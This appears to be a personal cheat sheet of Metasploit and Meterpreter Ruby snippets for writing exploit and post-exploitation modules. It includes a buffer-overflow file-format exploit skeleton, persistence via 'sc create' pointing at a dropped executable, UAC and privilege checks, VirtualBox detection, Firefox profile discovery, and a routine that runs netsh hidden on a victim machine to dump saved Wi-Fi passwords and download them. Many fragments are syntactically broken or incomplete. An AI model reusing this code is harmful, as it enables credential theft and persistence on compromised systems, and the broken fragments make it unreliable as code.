msf API calls

1. # This is my imaginary exploit in ruby
2. include Msf::Exploit::FILEFORMAT
3. buf = ""
4. buf << "A" * 1024
5. buf << [0x40201f01].pack("V")
6. buf << "\x90" * 10
7. buf << payload.encoded
8. file_create(buf)
9.  
10. register_options(
11.   [
12.     OptString.new('FILENAME', [true, 'The malicious file name',  'msf.jpg'])
13.   ], self.class)
14.  
15.  
16.  
17.  
18.  
19. # write to local file
20. File = file.open("/root/test", "w")
21. File.write("sc create #{sname} binpath= \"%tmp%\\t.exe\" start= auto")
22. File.close
23.  
24. #use backslash to escape double quotes
25. ("sc create #{sname} bin= \"%tmp%\\fg.exe\"")
26.  
27.  
28. # random name file
29. rand = Rex::Text.rand_text_alpha(8)+".log"
30. print_good("#{rand} file created")
31.  
32.  
33.  
34.  
35. # check if file exists
36. print_warning("check if file exists")
37. path="%systemroot%\\system32\\ola.txt"
38. if session.fs.file.exist?(path)
39.  
40.  
41. # check if directory exists
42. get_path = "C:\windows"
43.  if session.fs.directory.exist?(#{get_path})
44.       print_good('Vuln path exists')
45.       CheckCode::Appears
46.     else
47.       vprint_error("#{get_path} doesn't exist on target")
48.       CheckCode::Safe
49.     end
50.  
51.  
52.  
53. #Ruby function to check directory existence
54. if(File.directory?('arjun'))
55.   puts 'Directory exists'
56. else
57.   puts 'Directory not found'
58. end
59.  
60.  
61. Syntax: client.fs.dir.mkdir("c:\\oldman")
62. Output: 0
63. Comment: This will make a directory named "oldman" in c drive.
64.  
65.  
66. # List processes
67. # We can access the list of processes from “session.sys.process” using “get_processes” method.
68. # Print processes if it is requested
69. if listprocesses == TRUE
70.   print_status('Process list:')
71.   print_line('')
72.     session.sys.process.get_processes().each do |x|        
73.     print_good("#{x['name']} [#{x['pid']}]")    
74.     end
75.   print_line('')
76. end
77.  
78.  
79.  
80. # check if is a meterpreter session
81. client = session
82. if session.type != "meterpreter"
83.   print_error "Only meterpreter sessions are supported on Windows hosts"
84.   return
85. end
86.  
87. # check if is a meterpreter session
88. print_status("Running module against #{sysnfo['Computer']}") if not sysinfo.nil?
89.  
90.  
91. # check if its system
92. isadd = is_admin?
93. if(isadd)
94. print_line('we are admin')
95. else
96. print_line('not admin access level')
97. end
98.  
99.  
100.  
101. # check if its admin
102. issys = is_system?
103. if(issys)
104. print_line('we are system')
105. else
106. print_line('not a system access level')
107. end
108.  
109.  
110.  
111.   # Returns true if UAC is enabled
112.   #
113.   # Returns false if the session is running as system, if uac is disabled or
114.   # if running on a system that does not have UAC
115.   #
116.   def is_uac_enabled?
117.     uac = false
118.     winversion = session.sys.config.sysinfo['OS']
119.  
120.     if winversion =~ /Windows (Vista|7|8|2008|2012)/
121.       unless is_system?
122.         begin
123.           enable_lua = registry_getvaldata(
124.               'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System',
125.               'EnableLUA'
126.           )
127.           uac = (enable_lua == 1)
128.         rescue Rex::Post::Meterpreter::RequestError => e
129.           print_error("Error Checking if UAC is Enabled: #{e.class} #{e}")
130.         end
131.       end
132.     end
133.     return uac
134.   end
135.  
136.   #
137.   # Returns the UAC Level
138.   #
139.   # @see http://technet.microsoft.com/en-us/library/dd835564(v=ws.10).aspx
140.   # 2 - Always Notify, 5 - Default, 0 - Disabled
141.   #
142.   def get_uac_level
143.     begin
144.       uac_level = registry_getvaldata(
145.           'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System',
146.           'ConsentPromptBehaviorAdmin'
147.       )
148.     rescue Rex::Post::Meterpreter::RequestError => e
149.       print_error("Error Checking UAC Level: #{e.class} #{e}")
150.     end
151.  
152.     if uac_level
153.       return uac_level
154.     else
155.       return nil
156.     end
157.   end
158.  
159.  
160.  
161. #
162. # by darkoperator
163. # check powershell version on target
164. def checkps2
165.   os = sysinfo['OS']
166.   if os =~ /windows 2012|2016|7|8|10/
167.     print_status('checking if ps2 engine its enable')
168.     path = "HKLM\\SOFTWARE\\Microsoft\\Powershell\\1"
169.     if registry_enumkeys(path).include?("PowerShellEngine")
170.       if registry_getvaldata("#{path}\\PowerShellEngine", 'PowerShellVersion') == '2.0'
171.         print_good("\tPowerShell 2.0 engine is enabled")
172.         report_note(
173.                 :host  => session,
174.                 :type  => 'host.log.ps_v2_feature',
175.                 :data{
176.                   :enabled => true},
177.                 :update => :unique_data
178.              )
179.  
180.       else
181.         print_good("\tPowerShell 2.0 engine not enabled")
182.                 report_note(
183.                 :host  => session,
184.                 :type  => 'host.log.ps_v2_feature',
185.                 :data{
186.                   :enabled => false},
187.                 :update => :unique_data
188.              )
189.       end
190.     end
191.   end
192. end
193.  
194.  
195.  
196.  
197.  
198.  
199.  
200.  
201. # display report note ???
202. hpat = client.fs.file.expand_path("%HOMEPATH%")
203. syhd = client.fs.file.expand_path("%SYSTEMDRIVE%")
204.  
205.       report_note(
206.         :host   => session,
207.         :home   => #{hpat},
208.         :system => #{syhd},
209.         :update => :unique_data
210.         )
211.       print_status("This is a Sun VirtualBox Virtual Machine")
212.       return "VirtualBox"
213.     end
214.   end
215.  
216.  
217.  
218.  
219.  
220. Syntax: client.sys.config.sysinfo["System Language"]
221. Output: "en_US"
222. Comment: This will give operating system language of the compromised system.
223. -----------
224. REG QUERY HKLM\System\CurrentControlSet\Control\Nls\Language /v InstallLanguage
225. 0436 = "af;Afrikaans"
226. 041C = "sq;Albanian"
227. 0001 = "ar;Arabic"
228. 0401 = "ar-sa;Arabic (Saudi Arabia)"
229. 0801 = "ar-iq;Arabic (Iraq)"
230. 0C01 = "ar-eg;Arabic (Egypt)"
231. 1001 = "ar-ly;Arabic (Libya)"
232. 1401 = "ar-dz;Arabic (Algeria)"
233. 1801 = "ar-ma;Arabic (Morocco)"
234. 1C01 = "ar-tn;Arabic (Tunisia)"
235. 2001 = "ar-om;Arabic (Oman)"
236. 2401 = "ar-ye;Arabic (Yemen)"
237. 2801 = "ar-sy;Arabic (Syria)"
238. 2C01 = "ar-jo;Arabic (Jordan)"
239. 3001 = "ar-lb;Arabic (Lebanon)"
240. 3401 = "ar-kw;Arabic (Kuwait)"
241. 3801 = "ar-ae;Arabic (you.A.E.)"
242. 3C01 = "ar-bh;Arabic (Bahrain)"
243. 4001 = "ar-qa;Arabic (Qatar)"
244. 042D = "eu;Basque"
245. 0402 = "bg;Bulgarian"
246. 0423 = "be;Belarusian"
247. 0403 = "ca;Catalan"
248. 0004 = "zh;Chinese"
249. 0404 = "zh-tw;Chinese (Taiwan)"
250. 0804 = "zh-cn;Chinese (China)"
251. 0C04 = "zh-hk;Chinese (Hong Kong SAR)"
252. 1004 = "zh-sg;Chinese (Singapore)"
253. 041A = "hr;Croatian"
254. 0405 = "cs;Czech"
255. 0406 = "the;Danish"
256. 0413 = "nl;Dutch (Netherlands)"
257. 0813 = "nl-be;Dutch (Belgium)"
258. 0009 = "en;English"
259. 0409 = "en-us;English (United States)"
260. 0809 = "en-gb;English (United Kingdom)"
261. 0C09 = "en-au;English (Australia)"
262. 1009 = "en-ca;English (Canada)"
263. 1409 = "en-nz;English (New Zealand)"
264. 1809 = "en-ie;English (Ireland)"
265. 1C09 = "en-za;English (South Africa)"
266. 2009 = "en-jm;English (Jamaica)"
267. 2809 = "en-bz;English (Belize)"
268. 2C09 = "en-tt;English (Trinidad)"
269. 0425 = "et;Estonian"
270. 0438 = "fo;Faeroese"
271. 0429 = "fa;Farsi"
272. 040B = "fi;Finnish"
273. 040C = "fr;French (France)"
274. 080C = "fr-be;French (Belgium)"
275. 0C0C = "fr-ca;French (Canada)"
276. 100C = "fr-ch;French (Switzerland)"
277. 140C = "fr-lu;French (Luxembourg)"
278. 043C = "gd;Gaelic"
279. 0407 = "de;German (Germany)"
280. 0807 = "de-ch;German (Switzerland)"
281. 0C07 = "de-at;German (Austria)"
282. 1007 = "de-lu;German (Luxembourg)"
283. 1407 = "de-li;German (Liechtenstein)"
284. 0408 = "el;Greek"
285. 040D = "he;Hebrew"
286. 0439 = "hi;Hindi"
287. 040E = "hu;Hungarian"
288. 040F = "is;Icelandic"
289. 0421 = "in;Indonesian"
290. 0410 = "it;Italian (Italy)"
291. 0810 = "it-ch;Italian (Switzerland)"
292. 0411 = "ja;Japanese"
293. 0412 = "ko;Korean"
294. 0426 = "lv;Latvian"
295. 0427 = "lt;Lithuanian"
296. 042F = "mk;FYRO Macedonian"
297. 043E = "ms;Malay (Malaysia)"
298. 043A = "mt;Maltese" 0414 = "no;Norwegian (Bokmal)"
299. 0814 = "no;Norwegian (Nynorsk)"
300. 0415 = "pl;Polish"
301. 0416 = "pt-br;Portuguese (Brazil)"
302. 0816 = "pt;Portuguese (Portugal)"
303. 0417 = "rm;Rhaeto-Romanic"
304. 0418 = "ro;Romanian"
305. 0818 = "ro-mo;Romanian (Moldova)"
306. 0419 = "ru;Russian"
307. 0819 = "ru-mo;Russian (Moldova)"
308. 0C1A = "sr;Serbian (Cyrillic)"
309. 081A = "sr;Serbian (Latin)"
310. 041B = "sk;Slovak"
311. 0424 = "sl;Slovenian"
312. 042E = "sb;Sorbian"
313. 040A = "es;Spanish (Traditional Sort)"
314. 080A = "es-mx;Spanish (Mexico)"
315. 0C0A = "es;Spanish (International Sort)"
316. 100A = "es-gt;Spanish (Guatemala)"
317. 140A = "es-cr;Spanish (Costa Rica)"
318. 180A = "es-pa;Spanish (Panama)"
319. 1C0A = "es-do;Spanish (Dominican Republic)"
320. 200A = "es-ve;Spanish (Venezuela)"
321. 240A = "es-co;Spanish (Colombia)"
322. 280A = "es-pe;Spanish (Peru)"
323. 2C0A = "es-ar;Spanish (Argentina)"
324. 300A = "es-ec;Spanish (Ecuador)"
325. 340A = "es-cl;Spanish (Chile)"
326. 380A = "es-uy;Spanish (Uruguay)"
327. 3C0A = "es-py;Spanish (Paraguay)"
328. 400A = "es-bo;Spanish (Bolivia)"
329. 440A = "es-sv;Spanish (El Salvador)"
330. 480A = "es-hn;Spanish (Honduras)"
331. 4C0A = "es-ni;Spanish (Nicaragua)"
332. 500A = "es-pr;Spanish (Puerto Rico)"
333. 0430 = "sx;Sutu"
334. 041D = "sv;Swedish"
335. 081D = "sv-fi;Swedish (Finland)"
336. 041E = "th;Thai"
337. 0431 = "ts;Tsonga"
338. 0432 = "tn;Tswana"
339. 041F = "tr;Turkish"
340. 0422 = "uk;Ukrainian"
341. 0420 = "your;Urdu"
342. 042A = "vi;Vietnamese"
343. 0434 = "xh;Xhosa"
344. 043D = "ji;Yiddish"
345. 0435 = "zu;Zulu"
346. -----------
347.  
348.  
349.  
350.  
351.  
352.  
353.  
354.  
355.  
356. # ------------------------------------------
357. # DUMP PASSWORD FROM SELECTED ESSID WLAN/LAN
358. # ------------------------------------------
359. def ls_stage3
360.   inuse = datastore['INTERFACE']
361.   essid = datastore['DUMP_ESSID']
362.   dpath = datastore['DOWNLOAD_PATH']
363.   lang = client.sys.config.sysinfo["System Language"]
364.  
365.     if lang =~ /pt/
366.       lag = key
367.     else
368.       lag = Chave
369.     end
370.  
371.     r=''
372.     # execute cmd prompt in a hidden channelized windows!
373.     # and build dump.log with results (dump) in target %temp% folder
374.     # If we want to dump only password of ESSID and not he all profile use "key=clear | findstr Key"
375.     r = session.sys.process.execute("cmd.exe /c netsh #{inuse} show profile #{essid} key=clear | findstr #{lag} > %temp%\\dump.log", nil, {'Hidden' => true, 'Channelized' => true})
376.  
377.        # download 'dump.log' from target machine using one API call
378.        print_status(" Dumping Credentials of: #{essid}")
379.        client.fs.file.download("#{dpath}/dump.log","%temp%\\dump.log")
380.  
381.     # close channel when done
382.     r.channel.close
383.     r.close
384.  
385.   # error exception funtion
386.   rescue ::Exception => e
387.   print_error(" Error: #{e.class} #{e}")
388.   print_error(" Try to rise meterpreter session to [nt authority/system] before runing this module")
389. end
390.  
391.  
392.  
393.  
394.  
395.  
396.  
397. # -------------------------------------------------------------
398.  
399.  
400.   def check
401.     vuln = false
402.     winver = sysinfo["OS"]
403.     affected = [ 'Windows Vista', 'Windows 7', 'Windows 2008' ]
404.     affected.each { |v|
405.       if winver.include? v
406.         vuln = true
407.         break
408.       end
409.  
410.  
411.  
412.  
413.  
414. # -------------------------------------------------------------------------------------------
415.  
416.  
417. # List all the available interface from victims system
418.  
419. Syntax: client.net.config.get_interfaces
420. Output: [......]
421. Comment: This will return an array of the first interface available in the victims system along with the details like IP, netmask, mac_address etc
422.  
423.  
424.  
425.  
426.  
427.  
428.  
429.  
430. # ------------------------------------------------------------------------------------------
431. # se... o command nao fizer o display do netsh
432. # entao enviar o display para um log file
433. # e fazer o download dele
434. r = session.sys.process.execute("cmd.exe /c netsh interface show interface > %temp%\\dum.txt", nil, {'Hidden' => true, 'Channelized' => true})
435.  
436.  
437. # Download file from victims system
438. Syntax: client.fs.file.download("/root/dum.txt","%temp%\\dum.txt")
439. Output: ["c:\\temp\\dum.txt"]
440. Comment: This will download dum.txt from victims system and will save it to attackers root directory
441.  
442. #Open a file in read mode and copy the content to some variable
443. Syntax: file1 = client.fs.file.new("%temp%\\dum.txt")
444.               vtemp = ""
445.               until file1.eof?
446.               vtemp << file_object.read
447. Output: N.A
448. Comment: This will copy all the data inside dum.txt and store it in vtemp variable
449.  
450.  
451. # display variable to user
452. print_good("    #{vtemp}")
453. # print_line("\n" + vtemp.to_s + "\n")
454. # -------------------------------------------------------------------------------------------
455.  
456.  
457.  
458.  
459. # ------------------------------------------------------------------------------------------
460. # try to fill a table ???
461. # ------------------------------------------------------------------------------------------
462.           # building table display
463.           tbl = Rex::Ui::Text::Table.new(
464.               'Header'  => 'Interfaces Active',
465.               'Indent'  => 1,
466.               'Columns' =>
467.           [
468.                       'wlan',
469.                       'lan'
470.           ])
471.  
472.      # Gather target user data
473.      file1 = client.fs.file.new("%temp%\\dum.txt")
474.            vtemp = ""
475.            until file1.eof?
476.            vtemp << file.read
477.  
478.      # Store in tables and print results on screen
479.      tbl << [vtemp]
480.      print_line("\n" + tbl.to_s + "\n")
481. # ------------------------------------------------------------------------------------------
482.  
483.  
484. # This sample demonstrates how a file can be encoded using a framework encoder.
485.  
486. $:.unshift(File.join(File.dirname(__FILE__), ’..’, ’..’, ’..’,
487. ’lib’))
488. require ’msf/base’
489. if (ARGV.empty?)
490. puts "Usage: #{File.basename(__FILE__)} encoder_name file_name format"
491. exit
492. end
493. framework = Msf::Simple::Framework.create
494. begin
495. # Create the encoder instance.
496. mod = framework.encoders.create(ARGV.shift)
497. puts(Msf::Simple::Buffer.transform(
498. mod.encode(IO.readlines(ARGV.shift).join), ARGV.shift || ’ruby’))
499. rescue
500. puts "Error: #{$!}\n\n#{[email protected]("\n")}"
501. end
502.  
503.  
504.  
505.  
506. # ------------------------------------------------------------------------------------------
507.  
508.     if not vm
509.       if registry_getvaldata('HKLM\HARDWARE\DESCRIPTION\System','SystemBiosVersion') =~ /vbox/i
510.         vm = true
511.       end
512.     end
513.     if not vm
514.       srvvals = registry_enumkeys('HKLM\SYSTEM\ControlSet001\Services')
515.       if srvvals and srvvals.include?("VBoxMouse")
516.         vm = true
517.       elsif srvvals and srvvals.include?("VBoxGuest")
518.         vm = true
519.       elsif srvvals and srvvals.include?("VBoxService")
520.         vm = true
521.       elsif srvvals and srvvals.include?("VBoxSF")
522.         vm = true
523.       end
524.     end
525.     if vm
526.       report_note(
527.         :host   => session,
528.         :type   => 'host.hypervisor',
529.         :data   => { :hypervisor => "VirtualBox" },
530.         :update => :unique_data
531.         )
532.       print_status("This is a Sun VirtualBox Virtual Machine")
533.       return "VirtualBox"
534.     end
535.   end
536.  
537.  
538. # ------------------------
539.  
540.  
541. def check_firefox_win(path)
542.     paths  = []
543.     ffpath = []
544.     path   = path + "\\Mozilla\\"
545.     print_status("Checking for Firefox profile in: #{path}")
546.  
547.     stat = session.fs.file.stat(path + "Firefox\\profiles.ini") rescue nil
548.     if !stat
549.       print_error("Firefox was not found (Missing profiles.ini)")
550.       return
551.     end
552.  
553.     session.fs.dir.foreach(path) do |fdir|
554.       #print_status("Found a Firefox directory: #{path + fdir}")
555.       ffpath << path + fdir
556.       break
557.     end
558.  
559.     if ffpath.empty?
560.       print_error("Firefox was not found")
561.       return
562.     end
563.  
564.     #print_status("Locating Firefox profiles")
565.     path << "Firefox\\Profiles\\"
566.  
567.     # We should only have profiles in the Profiles directory store them all
568.     begin
569.       session.fs.dir.foreach(path) do |pdirs|
570.         next if pdirs == "." or pdirs == ".."
571.         vprint_good("Found profile: #{path + pdirs}")
572.         paths << path + pdirs
573.       end
574.     rescue
575.       print_error("Profiles directory is missing")
576.       return
577.     end
578.  
579.     paths.empty? ? (nil) : (paths)
580.   end
581.  
582.  
583. EOF